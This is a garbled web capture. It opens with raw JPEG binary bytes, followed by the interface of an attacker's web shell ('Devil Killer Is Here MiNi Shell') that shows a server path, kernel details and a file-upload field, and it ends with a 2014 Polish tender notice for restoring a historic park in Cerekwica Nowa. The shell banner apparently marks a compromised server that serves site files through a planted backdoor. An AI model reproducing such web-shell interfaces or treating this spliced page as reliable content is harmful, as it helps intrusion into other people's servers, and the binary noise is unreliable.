JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140912/195545-N-2014.html

<p class="kh_header"><b>Jaraczewo: Rewaloryzacja przyrodnicza zabytkowego parku
na terenie Zespołu Pałacowo - Parkowego w Cerekwicy Nowej</b><br>
<b>Numer ogłoszenia: 195545 - 2014; data zamieszczenia: 12.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy w Cerekwicy Nowej , Jaraczewo 1, 63-233 Jaraczewo, woj. wielkopolskie, tel. 0-62 7409701, faks 0-62 7409701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> cerekwica-mow@home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewaloryzacja przyrodnicza zabytkowego parku
na terenie Zespołu Pałacowo - Parkowego w Cerekwicy Nowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi wykonanie zadania: Rewaloryzacja przyrodnicza zabytkowego
parku na terenie Zespołu Pałacowo - Parkowego w Cerekwicy Nowej.
Pełny i szczegółowy zakres przedmiotu zamówienia oraz sposób jego wykonania został
wskazany niniejszej specyfikacji, a zwłaszcza w dokumentach stanowiących załączniki
do specyfikacji.
Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w niniejszej
specyfikacji oraz w dokumentach stanowiących załączniki do specyfikacji - dodaje się
słowa: lub równoważne.
Wykonawca udzieli gwarancji na wykonane prace na okres wskazany w ofercie, jednak
nie krótszy niż 36 miesięcy.
Zamawiający informuje, iż zastrzega sobie prawo żądania od Wykonawców przedstawienia
opisu oraz parametrów materiałów przyjętych do wyceny przedmiotu zamówienia,
w celu oceny zgodności przedstawionej oferty wraz z wymaganiami Zamawiającego.
Za wytwórcę odpadów - w rozumieniu przepisów prawa - uważa się Wykonawcę wyłonionego
w wyniku niniejszego postępowania.
Termin płatności prawidłowo wystawionych faktur: do 30 dni od dnia ich złożenia
u Zamawiającego.
W ramach realizacji przedmiotu zamówienia, Wykonawca zobowiązany jest do:
1. Ścisłej współpracy z Zamawiającym
2. Przygotowania na swój koszt terenu, składowisk, magazynów, pomieszczeń socjalnych
dla pracowników
3. Pokrycia wszystkich kosztów i opłat koniecznych do wykonania przedmiotu umowy
4. Zabezpieczenia terenu i prowadzonych prac
5. Ubezpieczenia prac
6. Postępowania z wszystkimi odpadami zgodnie z przepisami prawa
7. Uczestniczenia w naradach zwołanych przez Zamawiającego
8. Przedkładania sprawozdań rzeczowych - wg potrzeb Zamawiającego
9. Informowania Zamawiającego o problemach lub okolicznościach mogących wpłynąć
na jakość prac lub opóźnienia terminu zakończenia wykonania przedmiotu zamówienia
10. Pełnej obsługi dostaw materiałów, itd. do wykonania przedmiotu zamówienia
11. Przywrócenia do stanu pierwotnego zniszczonych lub uszkodzonych składników
majątkowych
12. Uporządkowania terenu budowy i przekazania go Zamawiającemu w terminie odbioru
prac.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 77.21.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w kwocie 3.000,00 zł (słownie:
trzy tysiące złotych 00/100).
2. Wadium może być wniesione w jednej lub kilku następujących formach:2.1. pieniądzu
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem
pieniężnym
2.3. gwarancjach bankowych
2.4. gwarancjach ubezpieczeniowych
2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b
ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej
Agencji Rozwoju Przedsiębiorczości
3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy
Zamawiającego w BZ WBK Oddział w Jarocinie nr 28 1090 1131 0000 0001
0333 3841. Wadium wnoszone w pozostałych formach, należy złożyć w formie
oryginału w Młodzieżowym Ośrodku Wychowawczym, Cerekwica Nowa,
63-233 Jaraczewo (pokój nr 1 - Sekretariat Ośrodka). Do oferty należy dołączyć
kopię dokumentu wadialnego potwierdzonego przez wykonawcę za zgodność
z oryginałem
4. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji
gwaranta. Gwarancja musi być podpisana przez upoważnionego
(upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony
w sposób umożliwiający jego identyfikację np.: złożony wraz z imienną pieczątkę
lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać
bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego
w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu
pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5
ustawy Pzp
5. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania
ofert, tj. do dnia 22.09.2014 r. do godz. 10.00
6. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie
znajdzie się na rachunku bankowym Zamawiającego.
7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy ofertę akceptowalną
formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie
uznana za odrzuconą.
8. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze
oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy,
którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem
pkt 8.13 SIWZ.
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający
zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał
ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu
zwrócono wadium na podstawie pkt 8.8 SIWZ, jeżeli w wyniku rozstrzygnięcia
odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca
wniesie wadium w terminie określonym przez Zamawiającego.
12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji
bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów
lub oświadczeń, wymienionych w pkt 6 SIWZ lub pełnomocnictw,
chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
14. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego
oferta została wybrana:
14.1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie,
14.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
14.3. zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe
z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności,
jeżeli przepisy prawa nakładają obowiązek ich posiadania
2. Posiadają niezbędną wiedzę i doświadczenie
3. Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi
do wykonania zamówienia
4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia
5. Wykażą wykonane główne usługi w okresie ostatnich trzech lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania
i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów,
czy zostały wykonane należycie, w tym Wykonawca wykaże, że wykonał
minimum 2 zadania, których przedmiotem były czynności polegające na ścinaniu
nie mniej niż 20 drzew i sadzeniu nie mniej niż 100 drzew i/lub krzewów
(iglastych i/lub liściastych) - z zastrzeżeniem, że zakres wymieniony w niniejszym
podpunkcie mógł być wykonany w ramach wielu zadań
6. Wykażą narzędzia, wyposażenie zakładu i urządzenia techniczne dostępne Wykonawcy
usług w celu wykonania zamówienia wraz z informacją o podstawie
dysponowania tymi zasobami, przy czym najważniejszym elementem będzie
wskazanie, że Wykonawca dysponuje co najmniej takim sprzętem jak:
a) 1 piła mechaniczna
b) 1 specjalna maszyna przeznaczona do karczowania pni
c) 1 glebogryzarka
d) 1 wał do zakładania trawników
e) 1 siewnik
f) 1 kosiarka mechaniczna do pielęgnacji trawników
7. Złożą oświadczenie na temat wielkości średniego rocznego zatrudnienia u Wykonawcy
usług oraz liczebności personelu kierowniczego w okresie ostatnich
trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres
prowadzenia działalności jest krótszy - w tym okresie, przy czym najważniejszym
elementem będzie wskazanie, że wielkość średniego rocznego zatrudnienia
u Wykonawcy wynosiła co najmniej 2 pracowników, a liczebność personelu kierowniczego
- co najmniej 1 pracownik
4
8. Przedstawią część sprawozdania finansowego, a jeżeli podlega ono badaniu
przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również
z opinią o badanej części sprawozdania, a w przypadku wykonawców niezobowiązanych
do sporządzania sprawozdania finansowego innych dokumentów
określających obroty oraz zobowiązania i należności - za okres ostatnich trzech
lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten
okres, przy czym najważniejszym elementem będzie wskazanie przez Wykonawcę
obrotów, które nie mogą być mniejsze niż 200 tys. zł rocznie
9. Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej
potwierdzającą wysokość posiadanych środków finansowych w wysokości
nie mniejszej niż 200 tys. zł lub zdolność kredytową Wykonawcy w wysokości
nie mniejszej niż 200 tys. zł, wystawioną nie wcześniej niż trzy miesiące przed
upływem terminu składania ofert
10. Przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający,
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia, przy
czym najważniejszym elementem będzie wskazanie, że Wykonawca posiada polisę
na sumę gwarancyjną nie mniejszą niż 200 tys. zł
11. Złożą oświadczenie o braku podstaw do wykluczenia
12. Przedstawią aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu
do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia
w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż sześć
miesięcy przed upływem terminu składania ofert
13. Przedstawią aktualne zaświadczenie właściwego naczelnika urzędu skarbowego
potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia,
że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
organu - wystawione nie wcześniej niż trzy miesiące przed upływem
terminu składania ofert
14. Przedstawią aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń
Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,
że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne
i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu - wystawione nie wcześniej niż trzy miesiące
przed upływem terminu składania ofert
15. Przedstawią aktualną informację z Krajowego Rejestru Karnego w zakresie
określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp, wystawioną nie wcześniej niż
sześć miesięcy przed upływem terminu składania ofert
16. Przedstawią aktualną informację z Krajowego Rejestru Karnego w zakresie
określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż
sześć miesięcy przed upływem terminu składania ofert
17. Przedstawią aktualną informację z Krajowego Rejestru Karnego w zakresie
określonym w art. 24 ust. 1 pkt 10 i 11 ustawy Pzp, wystawioną nie wcześniej
niż sześć miesięcy przed upływem terminu składania ofert
18. Wskażą w ofercie część zamówienia, której wykonanie powierzą podwykonawcom
19. Złożą listę podmiotów należących do tej samej co Wykonawca grupy kapitałowej,
o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informację o tym, że
Wykonawca nie należy do grupy kapitałowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższych warunków na podstawie oświadczeń
i dokumentów, o których mowa w ust. 6, zgodnie z formułą: spełnia - nie spełnia.
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w warunki wykonawca
spełnia. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem
wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1. Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy
Pzp, wg załączonego do specyfikacji wzoru
6.2. Wykaz głównych usług wykonanych w okresie ostatnich trzech lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania
i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów,
czy zostały wykonane należycie, w tym Wykonawca wykaże, że wykonał
minimum 2 zadania, których przedmiotem były czynności polegające na ścinaniu
nie mniej niż 20 drzew i sadzeniu nie mniej niż 100 drzew i/lub krzewów
(iglastych i/lub liściastych) - z zastrzeżeniem, że zakres wymieniony w niniejszym
podpunkcie mógł być wykonany w ramach wielu zadań
6.3. Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy
usług w celu realizacji zamówienia wraz z informacją o podstawie
dysponowania tymi zasobami, przy czym najważniejszym elementem będzie
wskazanie, że Wykonawca dysponuje co najmniej takim sprzętem jak:
a) 1 piła mechaniczna
b) 1 specjalna maszyna przeznaczona do karczowania pni
c) 1 glebogryzarka
d) 1 wał do zakładania trawników
e) 1 siewnik
f) 1 kosiarka mechaniczna do pielęgnacji trawników</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na temat wielkości średniego rocznego zatrudnienia u Wykonawcy
usług oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat
przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia
działalności jest krótszy - w tym okresie, przy czym najważniejszym elementem
będzie wskazanie, że wielkość średniego rocznego zatrudnienia u Wykonawcy
wynosiła co najmniej 2 pracowników, a liczebność personelu kierowniczego -co najmniej 1 pracownik</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których
Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych
środków finansowych w wysokości nie mniejszej niż 200 tys. zł lub zdolność
kredytową w wysokości nie mniejszej niż 200 tys. zł Wykonawcy, wystawiona
nie wcześniej niż trzy miesiące przed upływem terminu składania ofert
 Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że
Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności związanej z przedmiotem zamówienia, przy czym najważniejszym
elementem będzie wskazanie, że Wykonawca posiada polisę na sumę gwarancyjną nie mniejszą niż 200 tys. zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

